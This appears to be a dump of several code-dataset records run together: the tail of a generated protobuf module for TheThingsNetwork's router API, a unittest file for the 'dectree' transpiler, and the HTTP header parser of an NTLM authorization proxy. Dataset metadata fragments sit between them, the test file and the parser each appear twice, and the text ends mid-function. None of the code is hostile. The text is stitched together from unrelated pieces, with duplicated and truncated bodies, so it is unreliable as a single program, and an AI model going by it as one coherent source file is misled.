has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\tGatewayID', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1280,
serialized_end=1337,
)
_GATEWAYSTATUSRESPONSE = _descriptor.Descriptor(
name='GatewayStatusResponse',
full_name='router.GatewayStatusResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='last_seen', full_name='router.GatewayStatusResponse.last_seen', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='router.GatewayStatusResponse.status', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1339,
serialized_end=1420,
)
_STATUSREQUEST = _descriptor.Descriptor(
name='StatusRequest',
full_name='router.StatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1422,
serialized_end=1437,
)
_STATUS = _descriptor.Descriptor(
name='Status',
full_name='router.Status',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='system', full_name='router.Status.system', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='component', full_name='router.Status.component', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_status', full_name='router.Status.gateway_status', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='uplink', full_name='router.Status.uplink', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='downlink', full_name='router.Status.downlink', index=4,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activations', full_name='router.Status.activations', index=5,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_gateways', full_name='router.Status.connected_gateways', index=6,
number=21, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_brokers', full_name='router.Status.connected_brokers', index=7,
number=22, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1440,
serialized_end=1704,
)
_UPLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_UPLINKMESSAGE.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DOWNLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DEVICEACTIVATIONREQUEST.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['activation_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._ACTIVATIONMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_GATEWAYSTATUSRESPONSE.fields_by_name['status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS
_STATUS.fields_by_name['system'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._SYSTEMSTATS
_STATUS.fields_by_name['component'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._COMPONENTSTATS
_STATUS.fields_by_name['gateway_status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['uplink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['downlink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['activations'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
DESCRIPTOR.message_types_by_name['SubscribeRequest'] = _SUBSCRIBEREQUEST
DESCRIPTOR.message_types_by_name['UplinkMessage'] = _UPLINKMESSAGE
DESCRIPTOR.message_types_by_name['DownlinkMessage'] = _DOWNLINKMESSAGE
DESCRIPTOR.message_types_by_name['DeviceActivationRequest'] = _DEVICEACTIVATIONREQUEST
DESCRIPTOR.message_types_by_name['DeviceActivationResponse'] = _DEVICEACTIVATIONRESPONSE
DESCRIPTOR.message_types_by_name['GatewayStatusRequest'] = _GATEWAYSTATUSREQUEST
DESCRIPTOR.message_types_by_name['GatewayStatusResponse'] = _GATEWAYSTATUSRESPONSE
DESCRIPTOR.message_types_by_name['StatusRequest'] = _STATUSREQUEST
DESCRIPTOR.message_types_by_name['Status'] = _STATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SubscribeRequest = _reflection.GeneratedProtocolMessageType('SubscribeRequest', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBEREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.SubscribeRequest)
})
_sym_db.RegisterMessage(SubscribeRequest)
UplinkMessage = _reflection.GeneratedProtocolMessageType('UplinkMessage', (_message.Message,), {
'DESCRIPTOR' : _UPLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.UplinkMessage)
})
_sym_db.RegisterMessage(UplinkMessage)
DownlinkMessage = _reflection.GeneratedProtocolMessageType('DownlinkMessage', (_message.Message,), {
'DESCRIPTOR' : _DOWNLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DownlinkMessage)
})
_sym_db.RegisterMessage(DownlinkMessage)
DeviceActivationRequest = _reflection.GeneratedProtocolMessageType('DeviceActivationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationRequest)
})
_sym_db.RegisterMessage(DeviceActivationRequest)
DeviceActivationResponse = _reflection.GeneratedProtocolMessageType('DeviceActivationResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationResponse)
})
_sym_db.RegisterMessage(DeviceActivationResponse)
GatewayStatusRequest = _reflection.GeneratedProtocolMessageType('GatewayStatusRequest', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusRequest)
})
_sym_db.RegisterMessage(GatewayStatusRequest)
GatewayStatusResponse = _reflection.GeneratedProtocolMessageType('GatewayStatusResponse', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusResponse)
})
_sym_db.RegisterMessage(GatewayStatusResponse)
StatusRequest = _reflection.GeneratedProtocolMessageType('StatusRequest', (_message.Message,), {
'DESCRIPTOR' : _STATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.StatusRequest)
})
_sym_db.RegisterMessage(StatusRequest)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
'DESCRIPTOR' : _STATUS,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.Status)
})
_sym_db.RegisterMessage(Status)
DESCRIPTOR._options = None
_UPLINKMESSAGE.fields_by_name['protocol_metadata']._options = None
_UPLINKMESSAGE.fields_by_name['gateway_metadata']._options = None
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration']._options = None
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['dev_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['app_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata']._options = None
_GATEWAYSTATUSREQUEST.fields_by_name['gateway_id']._options = None
_GATEWAYSTATUSRESPONSE.fields_by_name['status']._options = None
_ROUTER = _descriptor.ServiceDescriptor(
name='Router',
full_name='router.Router',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=1707,
serialized_end=1979,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.Router.GatewayStatus',
index=0,
containing_service=None,
input_type=github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Uplink',
full_name='router.Router.Uplink',
index=1,
containing_service=None,
input_type=_UPLINKMESSAGE,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Subscribe',
full_name='router.Router.Subscribe',
index=2,
containing_service=None,
input_type=_SUBSCRIBEREQUEST,
output_type=_DOWNLINKMESSAGE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Activate',
full_name='router.Router.Activate',
index=3,
containing_service=None,
input_type=_DEVICEACTIVATIONREQUEST,
output_type=_DEVICEACTIVATIONRESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTER)
DESCRIPTOR.services_by_name['Router'] = _ROUTER
_ROUTERMANAGER = _descriptor.ServiceDescriptor(
name='RouterManager',
full_name='router.RouterManager',
file=DESCRIPTOR,
index=1,
serialized_options=None,
serialized_start=1982,
serialized_end=2127,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.RouterManager.GatewayStatus',
index=0,
containing_service=None,
input_type=_GATEWAYSTATUSREQUEST,
output_type=_GATEWAYSTATUSRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetStatus',
full_name='router.RouterManager.GetStatus',
index=1,
containing_service=None,
input_type=_STATUSREQUEST,
output_type=_STATUS,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTERMANAGER)
DESCRIPTOR.services_by_name['RouterManager'] = _ROUTERMANAGER
# @@protoc_insertion_point(module_scope)
| 0 | 0 | 0 |
f5b8c671d74ac42322c9b17965495c9c4dd410c4 | 8,056 | py | Python | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | 3 | 2018-06-14T15:59:10.000Z | 2021-05-31T06:22:26.000Z | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | null | null | null | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | 1 | 2018-07-17T02:15:08.000Z | 2018-07-17T02:15:08.000Z | import os.path
import unittest
from io import StringIO
import numpy as np
from dectree.compiler import compile
from dectree.config import VECTORIZE_PROP
from dectree.transpiler import transpile
| 38.361905 | 105 | 0.627979 | import os.path
import unittest
from io import StringIO
import numpy as np
from dectree.compiler import compile
from dectree.config import VECTORIZE_PROP
from dectree.transpiler import transpile
def get_src(no1='false()', a='a', p1='P1', b='b', no2='NO'):
code = \
"""
types:
P1:
LOW: inv_ramp()
HIGH: ramp()
P2:
"YES": true()
"NO": {no1}
inputs:
- {a}: {p1}
outputs:
- b: P2
rules:
-
- if a == LOW:
- {b} = {no2}
- else:
- b = YES
"""
return code.format(a=a, b=b, p1=p1, no1=no1, no2=no2)
class TranspileTest(unittest.TestCase):
def test_transpile_success(self):
src_file = StringIO(get_src())
out_file = StringIO()
transpile(src_file, out_file=out_file)
self.assertIsNotNone(out_file.getvalue())
def test_transpile_failures(self):
src_file = StringIO("")
with self.assertRaises(ValueError) as cm:
transpile(src_file)
self.assertEqual(str(cm.exception), 'Empty decision tree definition')
src_file = StringIO("")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Empty decision tree definition')
src_file = StringIO("types:\n ")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), "Invalid decision tree definition: missing section "
"('types', 'inputs', 'outputs', 'rules') or all of them")
src_file = StringIO("types: null\ninputs: null\noutputs: null\nrules: null\n")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), "Invalid decision tree definition: section 'types' is empty")
src_file = StringIO(get_src(a='u'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Variable "a" is undefined')
src_file = StringIO(get_src(b='u'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Variable "u" is undefined')
src_file = StringIO(get_src(no1='false'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Illegal value for property "NO" of type "P2": False')
src_file = StringIO(get_src(p1='Radiance'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Type "Radiance" of variable "a" is undefined')
src_file = StringIO(get_src(no2='Radiance'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), '"Radiance" is not a property of type "P2" of variable "b"')
def test_transpile_with_defaults(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
out_file = os.path.join(os.path.dirname(__file__), 'dectree_test.py')
if os.path.exists(out_file):
os.remove(out_file)
transpile(src_file)
self.assertTrue(os.path.exists(out_file))
m = __import__('test.dectree_test')
self.assertTrue(hasattr(m, 'dectree_test'))
self.assertTrue(hasattr(m.dectree_test, 'Inputs'))
self.assertTrue(hasattr(m.dectree_test, 'Outputs'))
self.assertTrue(hasattr(m.dectree_test, 'apply_rules'))
inputs = m.dectree_test.Inputs()
outputs = m.dectree_test.Outputs()
inputs.glint = 0.2
inputs.radiance = 60.
m.dectree_test.apply_rules(inputs, outputs)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_compile_with_defaults(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
apply_rules, Inputs, Outputs = compile(src_file)
self.assertIsNotNone(apply_rules)
self.assertIsNotNone(Inputs)
self.assertIsNotNone(Outputs)
inputs = Inputs()
outputs = Outputs()
inputs.glint = 0.2
inputs.radiance = 60.
apply_rules(inputs, outputs)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_transpile_parameterized(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
out_file = os.path.join(os.path.dirname(__file__), 'dectree_test_p.py')
if os.path.exists(out_file):
os.remove(out_file)
transpile(src_file, out_file=out_file, parameterize=True)
self.assertTrue(os.path.exists(out_file))
m = __import__('test.dectree_test_p')
self.assertTrue(hasattr(m, 'dectree_test_p'))
self.assertTrue(hasattr(m.dectree_test_p, 'Inputs'))
self.assertTrue(hasattr(m.dectree_test_p, 'Outputs'))
self.assertTrue(hasattr(m.dectree_test_p, 'Params'))
self.assertTrue(hasattr(m.dectree_test_p, 'apply_rules'))
inputs = m.dectree_test_p.Inputs()
outputs = m.dectree_test_p.Outputs()
params = m.dectree_test_p.Params()
inputs.glint = 0.2
inputs.radiance = 60.
m.dectree_test_p.apply_rules(inputs, outputs, params)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_compile_parameterized(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
apply_rules, Inputs, Outputs, Params = compile(src_file, parameterize=True)
self.assertIsNotNone(apply_rules)
self.assertIsNotNone(Inputs)
self.assertIsNotNone(Outputs)
self.assertIsNotNone(Params)
inputs = Inputs()
outputs = Outputs()
params = Params()
inputs.glint = 0.2
inputs.radiance = 60.
apply_rules(inputs, outputs, params)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_transpile_vectorized(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
out_file = os.path.join(os.path.dirname(__file__), 'dectree_test_v.py')
if os.path.exists(out_file):
os.remove(out_file)
transpile(src_file, out_file=out_file, vectorize=VECTORIZE_PROP)
self.assertTrue(os.path.exists(out_file))
m = __import__('test.dectree_test_v')
self.assertTrue(hasattr(m, 'dectree_test_v'))
self.assertTrue(hasattr(m.dectree_test_v, 'Inputs'))
self.assertTrue(hasattr(m.dectree_test_v, 'Outputs'))
self.assertTrue(hasattr(m.dectree_test_v, 'apply_rules'))
inputs = m.dectree_test_v.Inputs()
outputs = m.dectree_test_v.Outputs()
inputs.glint = np.array([0.2, 0.3])
inputs.radiance = np.array([60.0, 10.0])
m.dectree_test_v.apply_rules(inputs, outputs)
np.testing.assert_almost_equal(outputs.cloudy, np.array([0.6, 0.0]))
np.testing.assert_almost_equal(outputs.certain, np.array([1.0, 1.0]))
def eval_func(f, x):
body = f()
code_lines = ["def y(x):"] + list(map(lambda l: ' ' + l, body.split('\n')))
code = '\n'.join(code_lines)
local_vars = {}
exec(code, None, local_vars)
y = local_vars['y']
return y(x)
| 7,582 | 18 | 257 |
e8959ae2201ff8ee23aaa916b0857726fe02cb73 | 11,281 | py | Python | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | 1 | 2016-10-03T23:00:44.000Z | 2016-10-03T23:00:44.000Z | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | null | null | null | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | null | null | null | # This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import string, urlparse
http_debug_file_name = 'http.debug'
#-----------------------------------------------------------------------
# tests client's header for correctness
def test_client_http_header(header_str):
""
request = string.split(header_str, '\012')[0]
parts = string.split(request)
# we have to have at least 3 words in the request
# poor check
if len(parts) < 3:
return 0
else:
return 1
#-----------------------------------------------------------------------
# tests server's response header for correctness
def test_server_http_header(header_str):
""
response = string.split(header_str, '\012')[0]
parts = string.split(response)
# we have to have at least 2 words in the response
# poor check
if len(parts) < 2:
return 0
else:
return 1
#-----------------------------------------------------------------------
def extract_http_header_str(buffer):
""
# let's remove possible leading newlines
t = string.lstrip(buffer)
# searching for the RFC header's end
delimiter = '\015\012\015\012'
header_end = string.find(t, delimiter)
if header_end < 0:
# may be it is defective header made by junkbuster
delimiter = '\012\012'
header_end = string.find(t, delimiter)
if header_end >=0:
# we have found it, possibly
ld = len(delimiter)
header_str = t[0:header_end + ld]
# Let's check if it is a proper header
if test_server_http_header(header_str) or test_client_http_header(header_str):
# if yes then let's do our work
if (header_end + ld) >= len(t):
rest_str = ''
else:
rest_str = t[header_end + ld:]
else:
# if not then let's leave the buffer as it is
# NOTE: if there is some junk before right header we will never
# find that header. Till timeout, I think. Not that good solution.
header_str = ''
rest_str = buffer
else:
# there is no complete header in the buffer
header_str = ''
rest_str = buffer
return (header_str, rest_str)
#-----------------------------------------------------------------------
def extract_server_header(buffer):
""
header_str, rest_str = extract_http_header_str(buffer)
if header_str:
header_obj = HTTP_SERVER_HEAD(header_str)
else:
header_obj = None
return (header_obj, rest_str)
#-----------------------------------------------------------------------
def extract_client_header(buffer):
""
header_str, rest_str = extract_http_header_str(buffer)
if header_str:
header_obj = HTTP_CLIENT_HEAD(header_str)
else:
header_obj = None
return (header_obj, rest_str)
#-----------------------------------------------------------------------
def capitalize_value_name(str):
""
tl = string.split(str, '-')
for i in range(len(tl)):
tl[i] = string.capitalize(tl[i])
return string.join(tl, '-')
#-----------------------------------------------------------------------
# some helper classes
#-----------------------------------------------------------------------
class HTTP_HEAD:
""
pass
#-------------------------------
def __init__(self, head_str):
""
self.head_source = ''
self.params = None
self.fields = None
self.order_list = []
self.head_source = head_str
head_str = string.strip(head_str)
records = string.split(head_str, '\012')
# Dealing with response line
#fields = string.split(records[0], ' ', 2)
t = string.split(string.strip(records[0]))
fields = t[:2] + [string.join(t[2:])]
self.fields = []
for i in fields:
self.fields.append(string.strip(i))
# Dealing with params
params = {}
order_list = []
for i in records[1:]:
parts = string.split(string.strip(i), ':', 1)
pname = string.lower(string.strip(parts[0]))
if not params.has_key(pname):
params[pname] = []
order_list.append(string.lower(pname))
try:
params[pname].append(string.strip(parts[1]))
except:
msg = "ERROR: Exception in head parsing. ValueName: '%s'" % pname
#print msg
self.debug(msg)
self.params = params
self.order_list = order_list
#-------------------------------
def debug(self, message):
""
try:
f = open(http_debug_file_name, 'a')
f.write(message)
f.write('\n=====\n')
f.write(self.head_source)
f.close()
except IOError:
pass
# Yes, yes, I know, this is just sweeping it under the rug...
# TODO: implement a persistent filehandle for logging debug messages to.
#-------------------------------
def copy(self):
""
import copy
return copy.deepcopy(self)
#-------------------------------
def get_param_values(self, param_name):
""
param_name = string.lower(param_name)
if self.params.has_key(param_name):
return self.params[param_name]
else:
return []
#-------------------------------
def del_param(self, param_name):
""
param_name = string.lower(param_name)
if self.params.has_key(param_name): del self.params[param_name]
#-------------------------------
def has_param(self, param_name):
""
param_name = string.lower(param_name)
return self.params.has_key(param_name)
#-------------------------------
def add_param_value(self, param_name, value):
""
param_name = string.lower(param_name)
if not self.params.has_key(param_name):
self.params[param_name] = []
if param_name not in self.order_list:
self.order_list.append(param_name)
self.params[param_name].append(value)
#-------------------------------
def replace_param_value(self, param_name, value):
""
self.del_param(param_name)
self.add_param_value(param_name, value)
#-------------------------------
def __repr__(self, delimiter='\n'):
""
res = ''
cookies = ''
res = string.join(self.fields, ' ') + '\n'
for i in self.order_list:
if self.params.has_key(i):
if i == 'cookie':
for k in self.params[i]:
cookies = cookies + capitalize_value_name(i) + ': ' + k + '\n'
else:
for k in self.params[i]:
res = res + capitalize_value_name(i) + ': ' + k + '\n'
res = res + cookies
res = res + '\n'
return res
#-------------------------------
def send(self, socket):
""
#"""
res = ''
cookies = ''
res = string.join(self.fields, ' ') + '\015\012'
for i in self.order_list:
if self.params.has_key(i):
if i == 'cookie':
for k in self.params[i]:
cookies = cookies + capitalize_value_name(i) + ': ' + k + '\015\012'
else:
for k in self.params[i]:
res = res + capitalize_value_name(i) + ': ' + k + '\015\012'
res = res + cookies
res = res + '\015\012'
#"""
#res = self.__repr__('\015\012')
# NOTE!!! 0.9.1 worked, 0.9.5 and 0.9.7 did not with MSN Messenger.
# We had problem here that prevent MSN Messenger from working.
# Some work is needed to make __rerp__ working instead of current code..
try:
#socket.send(self.head_source)
socket.send(res)
# self.debug(res)
return 1
except:
return 0
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
| 30.991758 | 92 | 0.503413 | # This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import string, urlparse
http_debug_file_name = 'http.debug'
#-----------------------------------------------------------------------
# tests client's header for correctness
def test_client_http_header(header_str):
""
request = string.split(header_str, '\012')[0]
parts = string.split(request)
# we have to have at least 3 words in the request
# poor check
if len(parts) < 3:
return 0
else:
return 1
#-----------------------------------------------------------------------
# tests server's response header for correctness
def test_server_http_header(header_str):
""
response = string.split(header_str, '\012')[0]
parts = string.split(response)
# we have to have at least 2 words in the response
# poor check
if len(parts) < 2:
return 0
else:
return 1
#-----------------------------------------------------------------------
def extract_http_header_str(buffer):
""
# let's remove possible leading newlines
t = string.lstrip(buffer)
# searching for the RFC header's end
delimiter = '\015\012\015\012'
header_end = string.find(t, delimiter)
if header_end < 0:
# may be it is defective header made by junkbuster
delimiter = '\012\012'
header_end = string.find(t, delimiter)
if header_end >=0:
# we have found it, possibly
ld = len(delimiter)
header_str = t[0:header_end + ld]
# Let's check if it is a proper header
if test_server_http_header(header_str) or test_client_http_header(header_str):
# if yes then let's do our work
if (header_end + ld) >= len(t):
rest_str = ''
else:
rest_str = t[header_end + ld:]
else:
# if not then let's leave the buffer as it is
# NOTE: if there is some junk before right header we will never
# find that header. Till timeout, I think. Not that good solution.
header_str = ''
rest_str = buffer
else:
# there is no complete header in the buffer
header_str = ''
rest_str = buffer
return (header_str, rest_str)
#-----------------------------------------------------------------------
def extract_server_header(buffer):
""
header_str, rest_str = extract_http_header_str(buffer)
if header_str:
header_obj = HTTP_SERVER_HEAD(header_str)
else:
header_obj = None
return (header_obj, rest_str)
#-----------------------------------------------------------------------
def extract_client_header(buffer):
""
header_str, rest_str = extract_http_header_str(buffer)
if header_str:
header_obj = HTTP_CLIENT_HEAD(header_str)
else:
header_obj = None
return (header_obj, rest_str)
#-----------------------------------------------------------------------
def capitalize_value_name(str):
